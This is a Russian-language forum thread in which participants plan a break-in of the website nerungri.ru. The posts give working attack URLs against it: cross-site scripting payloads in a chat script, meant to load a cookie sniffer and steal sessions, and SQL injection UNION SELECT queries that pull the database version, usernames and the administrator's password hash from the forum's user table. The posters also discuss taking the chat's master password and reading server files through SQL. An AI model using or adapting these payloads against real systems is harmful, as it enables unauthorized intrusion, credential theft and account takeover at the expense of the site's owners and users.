http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<script>alert(/XXX/);</script> подставь сниффер и закодируй в URL
Поставил сниффер а как URL закодировать, и ещё когда кидаю ссылку на снифер открывается новое окно ив нем загружаеться сниффер, поэтому в поле REFERRER нифига нет!
Вот если я подставляю снифер: http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=send_pwd&name=<IMG src=адрес сниффера> а дальше чё??? вот ещё http://www.nerungri.ru/cgi-bin/chat/chart.cgi?action=userinfo&infoabout=<IMG%20src%3Dадрес>
И как узнать сессию? Кстати там чтобы кикать, банить, короче для всего нужен мастерпароль который валяется по адресу http://www.nerungri.ru/cgi-bin/chat/config.cgi его оттуда никак не достать?
http://www.nerungri.ru/site/cnews/arhiv.shtml?Act=NewsList&Date=2004-05-06%27%20UNION%20SELECT+0,0,0,0,0,VERSION(),0,0,0,0/* http://www.nerungri.ru/site/cnews/a...rd,0,0,0,0 FROM phpbb_users WHERE user_id=2/* вот это под форум, щас надо попросить кого-нито, чтоб привязали уязвимость к чату
нет, сейчас он выводит хэш админа http://www.nerungri.ru/phpbb/ но иногда пароли совпадают..... ты знаешь вообще модеров там каких нибуть?
http://www.nerungri.ru/site/cnews/a...me,0,0,0,0 FROM phpbb_users WHERE user_id=3/* а вот и их имена, id=3 1inch например
вот только этого модера нету в чате, или ник у него другой.... Я не знаю, в Sql должна быть какая-нить возможность просмотра локальных файлов.